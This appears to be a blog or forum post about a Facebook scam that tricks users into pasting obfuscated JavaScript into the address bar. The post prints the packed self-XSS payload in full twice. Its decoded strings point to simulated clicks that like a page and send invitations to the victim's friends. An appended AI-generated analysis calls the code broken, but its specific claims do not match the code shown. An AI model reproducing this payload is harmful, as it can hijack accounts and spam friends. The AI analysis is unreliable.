I was sent this E-mail from Facebook

I don't have time to decipher it.
It's self modifying Javascript code. It's seems to also randomly encrypt itself to hide signatures. Maybe I am overestimating it but I don't think so.

Friend Xyz suggested you like Only 5% of rocket scientists know the answer to this...

Friend liked Only 5% of rocket scientists know the answer to this on Facebook and suggested you like it too.

To see more details and confirm this invitation, follow the link below:
http://www.facebook.com/n/?pages%2FOnly-5-of-rocket-scientists-know-the-answer-to-this%2F111715792203070&mid=2554677G28291dc5G6432cf1G4c&n_m=john.sokol%40gmail.com

It answer this question, they trick you in to copy and pasting this long string of scrambled Javascript in to your browsers URL windows, thereby running it.

Once there they get you to do this.

CTRL C - copy
ALT D - Move Focus to URL bar
CTRL V - past and it runs because there is /n at the end.

After inspecting it I figured what the hell and ran it. SO if you get something you'll know what it was.

From there it just seem to hang.

Here is the string :

javascript:(

function(){
a='app126063127406590_jop';
b='app126063127406590_jode';
ifc='app126063127406590_ifc';
ifo='app126063127406590_ifo';
mw='app126063127406590_mwrapper';
eval(
function(p,a,c,k,e,r){
e=function(c){
return(c)+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){
while(c--)r[e(c)]=k[c]||e(c);
     k=[function(e){return r[e]}];
     e=function(){return'\\w+'};
     c=1};
     while(c--)
        if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
        return p
     }('
Pe=[
"\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];
d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];
d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];
s=d[e[2]](e[6]);
m=d[e[2]](e[7]);
N=d[e[2]](e[8]);
c=d[e[10]](e[9]);
c[e[12]](e[11],E,E);
s[e[13]](c);
B(C(){1b[e[14]]()},O);
B(C(){1c[e[17]](e[15],e[16]);
B(C(){c[e[12]](e[11],E,E);
N[e[13]](c);
B(C(){F=M[e[19]](e[18]);
1d(i 1eF){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};
m[e[13]](c);
B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];
d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);
',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,
{}))})();

RAW as it arrived.

javascript:(function(){a='app126063127406590_jop';b='app126063127406590_jode';ifc='app126063127406590_ifc';ifo='app126063127406590_ifo';mw='app126063127406590_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(cparseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e... See More(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('P e=["\\p\\g\\l\\g\\I\\g\\k\\g\\h\\D","\\l\\h\\D\\k\\f","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\J\\D\\Q\\x","\\y\\g\\x\\x\\f\\j","\\g\\j\\j\\f\\z\\R\\K\\L\\S","\\p\\n\\k\\A\\f","\\l\\A\\o\\o\\f\\l\\h","\\k\\g\\G\\f\\q\\f","\\l\\k\\g\\j\\G","\\L\\r\\A\\l\\f\\v\\p\\f\\j\\h\\l","\\t\\z\\f\\n\\h\\f\\v\\p\\f\\j\\h","\\t\\k\\g\\t\\G","\\g\\j\\g\\h\\v\\p\\f\\j\\h","\\x\\g\\l\\u\\n\\h\\t\\y\\v\\p\\f\\j\\h","\\l\\f\\k\\f\\t\\h\\w\\n\\k\\k","\\l\\o\\q\\w\\g\\j\\p\\g\\h\\f\\w\\T\\r\\z\\q","\\H\\n\\U\\n\\V\\H\\l\\r\\t\\g\\n\\k\\w\\o\\z\\n\\u\\y\\H\\g\\j\\p\\g\\h\\f\\w\\x\\g\\n\\k\\r\\o\\W\\u\\y\\u","\\l\\A\\I\\q\\g\\h\\X\\g\\n\\k\\r\\o","\\g\\j\\u\\A\\h","\\o\\f\\h\\v\\k\\f\\q\\f\\j\\h\\l\\J\\D\\K\\n\\o\\Y\\n\\q\\f","\\Z\\y\\n\\z\\f","\\u\\r\\u\\w\\t\\r\\j\\h\\f\\j\\h"];d=M;d[e[2]](1a)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);N=d[e[2]](e[8]);c=d[e[10]](e[9]);c[e[12]](e[11],E,E);s[e[13]](c);B(C(){1b[e[14]]()},O);B(C(){1c[e[17]](e[15],e[16]);B(C(){c[e[12]](e[11],E,E);N[e[13]](c);B(C(){F=M[e[19]](e[18]);1d(i 1e F){1f(F[i][e[5]]==e[1g]){F[i][e[13]](c)}};m[e[13]](c);B(C(){d[e[2]](1h)[e[4]]=d[e[2]](1i)[e[5]];d[e[2]](e[1j])[e[1]][e[0]]=e[3]},1k)},1l)},1m)},O);',62,85,'||||||||||||||_0x82af|x65|x69|x74||x6E|x6C|x73||x61|x67|x76|x6D|x6F||x63|x70|x45|x5F|x64|x68|x72|x75|setTimeout|function|x79|true|inp|x6B|x2F|x62|x42|x54|x4D|document|sl|5000|var|x49|x48|x4C|x66|x6A|x78|x2E|x44|x4E|x53|||||||||||mw|fs|SocialGraphManager|for|in|if|20|ifo|ifc|21|2000|4000|3000'.split('|'),0,{}))})();

Further analysis: Gemini ai.

This code is a malicious JavaScript bookmarklet, likely for a Facebook spam or "auto-liker" application.
However, this specific code is broken and will not work. It contains programming errors that will cause it to fail immediately.

Here is a breakdown of what it tries to do and why it fails.

🧐 What It Tries to Do (Its Intent)

The code is "obfuscated" (intentionally scrambled) to hide its purpose. After de-obfuscating it, we can see its goal is to perform actions on a specific Facebook application (with the ID app126063127406590).

The script's intended actions are:

Hide the App: It first tries to hide the application's main wrapper on the page (the element with ID app126063127406590_mwrapper).
Access Your Friends List: It contains a URL to fetch a list of up to 5,000 of your Facebook friends. This is a common tactic for spam scripts, which use the list to tag all your friends in a post.
Post a Status: It finds Facebook's status update elements, including the text area (composer_text_field) and the submit button (composer_submit).
Perform Spam Actions: The ultimate goal is almost certainly to automatically post spam to your profile (and possibly tag your friends) on your behalf, all while hidden.

🛑 Why This Code Is Broken and Fails

This script won't work because it's badly written. It errors out on one of its first steps.

The script tries to run this line of code: c = document.getElementsByTagName("createElement")

This is an error. The programmer likely confused getElementsByTagName (which finds existing elements) with createElement (which creates a new one).

Immediately after, the script tries to call c.setAttribute(...), but c is not a single element; it's a list of elements (an HTMLCollection). This action fails and throws a fatal JavaScript error, stopping the entire script from running any further.

Even if it got past that error, it has other, similar errors later on (like trying to call fs.responseText(...) as if responseText were a function).

⚠️ Security Warning

You should never run unknown, obfuscated code in your browser's address bar or as a bookmarklet.

It's a common way to execute a Cross-Site Scripting (XSS) attack.
If the code were functional, it could steal your login information, compromise your account, post spam, or send messages to all your friends without your permission.

Delete this bookmarklet immediately.